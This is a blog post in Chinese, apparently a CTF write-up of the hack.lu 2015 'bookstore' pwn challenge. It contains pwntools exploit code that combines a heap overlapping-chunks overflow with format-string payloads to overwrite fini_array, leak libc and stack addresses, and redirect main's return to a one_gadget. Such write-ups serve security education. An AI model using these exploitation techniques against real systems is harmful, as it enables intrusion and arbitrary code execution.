<!DOCTYPE html>
<html lang="zh-Hans">
  <head><meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="How2heap--overlapping_chunks Hack.lu2015--bookstore"/><meta name="keywords" content="CTF, how2heap, hhdx's blog" /><link rel="alternate" href="/atom.xml" title="hhdx's blog" type="application/atom+xml"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.11.0" />
<link rel="canonical" href="http://hhdx.xyz/2020/07/05/How2heap-overlapping-chunks-Hack-lu2015-bookstore/"/>

<link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />
<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.11.0" />

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-177325662-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-177325662-1');
</script><script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script>
  window.config = {"leancloud":{"app_id":null,"app_key":null},"toc":true,"fancybox":true,"pjax":true,"latex":false};
</script>

    <title>How2heap--overlapping_chunks Hack.lu2015--bookstore - hhdx's blog</title>
  <meta name="generator" content="Hexo 5.2.0"></head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">hhdx's blog</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/">
        <li class="mobile-menu-item">Home
          </li>
      </a><a href="/archives/">
        <li class="mobile-menu-item">Archives
          </li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">Tags
          </li>
      </a><a href="/links/">
        <li class="mobile-menu-item">Links
          </li>
      </a><a href="/about/">
        <li class="mobile-menu-item">About
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">hhdx's blog</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/">
            Home
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/archives/">
            Archives
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/tags/">
            Tags
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/links/">
            Links
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/about/">
            About
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">How2heap--overlapping_chunks Hack.lu2015--bookstore
        </h1>

      <div class="post-meta">
        <span class="post-time">
          2020-07-05
        </span></div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">Contents</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#overlapping-chunks"><span class="toc-text">overlapping chunks</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hack-lu2015-bookstore"><span class="toc-text">hack.lu2015 bookstore</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#overlapping-chunks-amp-amp-format-string-vulnerability"><span class="toc-text">overlapping chunks &amp;&amp; format string vulnerability</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#phase-1"><span class="toc-text">phase 1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#phase-2"><span class="toc-text">phase 2</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Efini-array"><span class="toc-text">关于fini_array</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Reference"><span class="toc-text">Reference</span></a></li></ol>
    </div>
  </div><div class="post-content"><h2 id="overlapping-chunks"><a href="#overlapping-chunks" class="headerlink" title="overlapping chunks"></a>overlapping chunks</h2><p>溢出对unsortedbin中的<code>chunk-&gt;size</code>进行修改，造成堆块重叠。</p>
<h2 id="hack-lu2015-bookstore"><a href="#hack-lu2015-bookstore" class="headerlink" title="hack.lu2015 bookstore"></a>hack.lu2015 bookstore</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    No RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x3ff000)</span><br></pre></td></tr></table></figure>

<p>程序是一个订书系统，在main函数开始处，连续分配3个0x80的空间，一个存储订单1——order1，一个存储订单2——order2，一个存储提示信息——info。有以下功能菜单</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1: Edit order 1</span><br><span class="line">2: Edit order 2</span><br><span class="line">3: Delete order 1</span><br><span class="line">4: Delete order 2</span><br><span class="line">5: Submit</span><br></pre></td></tr></table></figure>

<p>Edit order 1/2：order1/order2使用fgetc读取字符串，读到<code>\n</code>终止，所以这里存在溢出</p>
<p>Delete order 1/2：free掉order1/order2。这里存在指针悬空</p>
<p>Submit： 分配0x140的空间（称为orderlist）将order1和order2拼接。这里存在溢出</p>
<p>程序末尾<code>printf(info)</code>存在可能的格式化字符串漏洞。</p>
<h3 id="overlapping-chunks-amp-amp-format-string-vulnerability"><a href="#overlapping-chunks-amp-amp-format-string-vulnerability" class="headerlink" title="overlapping chunks &amp;&amp; format string vulnerability"></a>overlapping chunks &amp;&amp; format string vulnerability</h3><a id="more"></a>

<p>总体思路：释放order2，溢出order1修改<code>order2chunk-&gt;size = 0x151</code>。并在order1上布置format string，以泄露libc和stack addr，和修改fini_array为start的地址。第二次format string修改main函数返回地址为one_gadget。</p>
<p>fini_array存储main函数结束后将要执行的函数地址，一般修改为main函数来达到再运行一次的目的。这里我修改为start也可以达到此效果，原本想达到main函数循环执行的效果，可是没有如我的心愿。。。</p>
<h4 id="phase-1"><a href="#phase-1" class="headerlink" title="phase 1"></a>phase 1</h4><p>溢出修改unsortedbin中的order2的大小为0x151后，再分配0x140的orderlist，将会出现下图的情况。要想办法将format string精准控制在info开始处。</p>
<p>submit函数中，连接order1后，<code>orderlist1 = &quot;Order 1: &quot; + XXXXXXXX</code>；order2指针悬空，和现在的orderlist指向的地址相同，所以连接order2将出现 <code>orderlist = &quot;Order 1: &quot; + XXXXXX + &quot;\nOrder 2: &quot; + orderlist1</code>。其中长度为9的字符串<code>Order 1: </code>出现了两次，长度为10的字符串<code>\nOrder 2: </code>出现了一次，故该函数额外向orderlist中填充了28个字节。</p>
<p><img src="https://raw.githubusercontent.com/lc1838228782/pics/master/img/image-20200705205842961.png" alt="image-20200705205842961"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># phase 1</span></span><br><span class="line">menu(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># format string: overwrite fini_arrary with start, leak libc and stack</span></span><br><span class="line">payload = <span class="string">b&quot;%1920x%13$hn...%14$s,,,%28$llx&quot;</span>.ljust(<span class="number">0x90</span><span class="number">-28</span>, <span class="string">b&quot;A&quot;</span>).ljust(<span class="number">0x88</span>, <span class="string">b&quot;\x00&quot;</span>) + p64(<span class="number">0x151</span>)</span><br><span class="line">menu(<span class="string">b&quot;1&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line"><span class="comment"># gdb.attach(io, &quot;b *0x400B09&quot;)</span></span><br><span class="line">menu(<span class="string">b&quot;5&quot;</span> + p8(<span class="number">0x1</span>)*<span class="number">7</span> + p64(fini_array) + p64(puts_got))</span><br></pre></td></tr></table></figure>

<p><code>%1920x%13$hn</code>，使用start地址0x400780，双字节覆盖fini_array，<code>13$</code>取第13个参数，<code>hn</code>控制写入双字节。</p>
<p><code>%14$s</code>，打印puts_got。</p>
<p><code>%28$llx</code>，打印stack地址。多次调试可以发现，main函数<code>rbp-0x10</code>处，存在一个与栈地址固定偏移0xf0的栈地址，应该为此前函数遗留。</p>
<p>利用fgets将这些参数传到栈上。</p>
<p><img src="https://raw.githubusercontent.com/lc1838228782/pics/master/img/image-20200705212508537.png" alt="image-20200705212508537"></p>
<h4 id="phase-2"><a href="#phase-2" class="headerlink" title="phase 2"></a>phase 2</h4><p>调试到第二轮次，计算此前泄露的栈地址与此次main函数返回地址偏移。</p>
<p>将one_gadget地址的低四字节，写到返回地址处，一次一个字节。因为双字节有偶发性printf崩溃，应该是打印长度过长了。(我这里使用的自编译的glibc2.26 without tcache)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">one_gadget = libc_base + <span class="number">0x40d82</span></span><br><span class="line">log.debug(<span class="string">&quot;one gadget: 0x%x&quot;</span> % one_gadget)</span><br><span class="line">p1 = one_gadget       &amp; <span class="number">0xff</span></span><br><span class="line">p2 = (one_gadget&gt;&gt;<span class="number">8</span>)  &amp; <span class="number">0xff</span></span><br><span class="line">p3 = (one_gadget&gt;&gt;<span class="number">16</span>) &amp; <span class="number">0xff</span></span><br><span class="line">p4 = (one_gadget&gt;&gt;<span class="number">24</span>) &amp; <span class="number">0xff</span></span><br><span class="line"></span><br><span class="line">part1 = p1</span><br><span class="line">part2 = p2-p1 <span class="keyword">if</span> p2 &gt; p1 <span class="keyword">else</span> <span class="number">256</span>-p1+p2</span><br><span class="line">part3 = p3-p2 <span class="keyword">if</span> p3 &gt; p2 <span class="keyword">else</span> <span class="number">256</span>-p2+p3</span><br><span class="line">part4 = p4-p3 <span class="keyword">if</span> p4 &gt; p3 <span class="keyword">else</span> <span class="number">256</span>-p3+p4</span><br><span class="line"></span><br><span class="line">menu(<span class="string">b&quot;4&quot;</span>)</span><br><span class="line">payload  = <span class="string">b&quot;%&quot;</span> + str(part1).encode(<span class="string">&quot;ascii&quot;</span>) + <span class="string">b&quot;x%13$hhn%&quot;</span> + str(part2).encode(<span class="string">&quot;ascii&quot;</span>) + <span class="string">b&quot;x%14$hhn&quot;</span></span><br><span class="line">payload += <span class="string">b&quot;%&quot;</span> + str(part3).encode(<span class="string">&quot;ascii&quot;</span>) + <span class="string">b&quot;x%15$hhn%&quot;</span> + str(part4).encode(<span class="string">&quot;ascii&quot;</span>) + <span class="string">b&quot;x%16$hhn&quot;</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x90</span><span class="number">-28</span>, <span class="string">b&quot;A&quot;</span>).ljust(<span class="number">0x88</span>, <span class="string">b&quot;\x00&quot;</span>) + p64(<span class="number">0x151</span>)</span><br><span class="line">menu(<span class="string">b&quot;1&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line"><span class="comment"># gdb.attach(io, &quot;b *0x400B09&quot;)</span></span><br><span class="line">menu(<span class="string">b&quot;5&quot;</span> + p8(<span class="number">0x1</span>)*<span class="number">7</span> + p64(ret_addr) + p64(ret_addr+<span class="number">1</span>) + p64(ret_addr+<span class="number">2</span>) + p64(ret_addr+<span class="number">3</span>))</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://github.com/lc1838228782/ctf_wps/blob/master/others/hack.lu2015%20bookstore/exp.py">exploit</a></p>
<h3 id="关于fini-array"><a href="#关于fini-array" class="headerlink" title="关于fini_array"></a>关于fini_array</h3><p><code>LIBC_START_MAIN</code>函数在执行完main函数后，执行<code>exit-&gt;__run_exit_handlers</code>，在<code>__run_exit_handlers</code>中调用<code>__call_tls_dtors</code>函数和<code>__exit_funcs</code>函数列表，该列表默认情况下只有<code>dl_fini</code>。结构如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">exit_function</span></span></span><br><span class="line"><span class="class">  &#123;</span></span><br><span class="line">    <span class="comment">/* `flavour&#x27; should be of type of the `enum&#x27; above but since we need</span></span><br><span class="line"><span class="comment">       this element in an atomic operation we have to use `long int&#x27;.  */</span></span><br><span class="line">    <span class="keyword">long</span> <span class="keyword">int</span> flavor;</span><br><span class="line">    <span class="keyword">union</span></span><br><span class="line">      &#123;</span><br><span class="line">	<span class="keyword">void</span> (*at) (<span class="keyword">void</span>);</span><br><span class="line">	<span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">	  &#123;</span></span><br><span class="line">	    <span class="keyword">void</span> (*fn) (<span class="keyword">int</span> status, <span class="keyword">void</span> *arg);</span><br><span class="line">	    <span class="keyword">void</span> *arg;</span><br><span class="line">	  &#125; on;</span><br><span class="line">	<span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">	  &#123;</span></span><br><span class="line">	    <span class="keyword">void</span> (*fn) (<span class="keyword">void</span> *arg, <span class="keyword">int</span> status);</span><br><span class="line">	    <span class="keyword">void</span> *arg;</span><br><span class="line">	    <span class="keyword">void</span> *dso_handle;</span><br><span class="line">	  &#125; cxa;</span><br><span class="line">      &#125; func;</span><br><span class="line">  &#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">exit_function_list</span></span></span><br><span class="line"><span class="class">  &#123;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">exit_function_list</span> *<span class="title">next</span>;</span></span><br><span class="line">    <span class="keyword">size_t</span> idx;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">exit_function</span> <span class="title">fns</span>[32];</span></span><br><span class="line">  &#125;;</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/lc1838228782/pics/master/img/image-20200705200936606.png" alt="image-20200705200936606"></p>
<p>其中idx在第一次遍历此列表时就变为0了，而且就算再将该值改为1，也不会再执行<code>fini_array</code>里的函数。后面再<code>dl_fini</code>里面也貌似有个防范多次执行的变量，可是这块过于复杂了对于我，再看下去势必要花不少时间且偏离方向了，日后再说吧。。。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// glibc release/2.26/master elf/dl-fini.c _dl_fini(void)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (l-&gt;l_init_called)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">/* Make sure nothing happens if we are called twice.  */</span></span><br><span class="line">    l-&gt;l_init_called = <span class="number">0</span>;</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure>

<p><code>struct exit_function</code>里存储的指针也经过了某种防范。</p>
<p><img src="https://raw.githubusercontent.com/lc1838228782/pics/master/img/image-20200705202457594.png" alt="image-20200705202457594"></p>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><ol>
<li>how2heap overlapping chunks</li>
<li><a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-246783.htm">https://bbs.pediy.com/thread-246783.htm</a></li>
</ol>

      </div>
      <div class="post-copyright">
    <p class="copyright-item">
      <span>Author: </span>
      <a href="http://hhdx.xyz">hhdx</a>
    </p>
    <p class="copyright-item">
      <span>Link: </span>
      <a href="http://hhdx.xyz/2020/07/05/How2heap-overlapping-chunks-Hack-lu2015-bookstore/">http://hhdx.xyz/2020/07/05/How2heap-overlapping-chunks-Hack-lu2015-bookstore/</a>
    </p>
    <p class="copyright-item">
      <span>License: </span><a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank">知识共享署名-非商业性使用 4.0 国际许可协议</a>
    </p>
  </div>
      <footer class="post-footer">
        <div class="post-tags">
            <a href="/tags/CTF/">CTF</a>
            <a href="/tags/how2heap/">how2heap</a>
            </div>
        
        <nav class="post-nav"><a class="prev" href="/2020/07/07/How2heap-house-of-force-Bctf2016-bcloud/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">How2heap--house_of_force Bctf2016--bcloud</span>
        <span class="prev-text nav-mobile">Prev</span>
      </a>
    <a class="next" href="/2020/07/03/How2heap-poison-null-byte-plaidctf2015-plaiddb/">
        <span class="next-text nav-default">How2heap--poison_null_byte Plaidctf2015--plaiddb</span>
        <span class="prev-text nav-mobile">Next</span>
        <i class="iconfont icon-right"></i>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"><div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a target="_blank" rel="noopener" href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div></div>
      </main>

      <footer id="footer" class="footer"><div class="social-links"><a target="_blank" rel="noopener" href="https://github.com/lc1838228782" class="iconfont icon-github" title="github"></a>
        <a target="_blank" rel="noopener" href="https://www.douban.com/people/57285004/" class="iconfont icon-douban" title="douban"></a>
        <a href="/atom.xml" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" target="_blank" rel="noopener" href="https://github.com/ahonn/hexo-theme-even">Even</a>
  </span>

  <span class="copyright-year">&copy;2016 - 2020<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">hhdx</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'http://hhdx.xyz/2020/07/05/How2heap-overlapping-chunks-Hack-lu2015-bookstore/';
        this.page.identifier = '2020/07/05/How2heap-overlapping-chunks-Hack-lu2015-bookstore/';
        this.page.title = 'How2heap--overlapping_chunks Hack.lu2015--bookstore';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//lyliuchao.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script><script type="text/javascript" src="/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/js/src/even.js?v=2.11.0"></script>
</body>
</html>
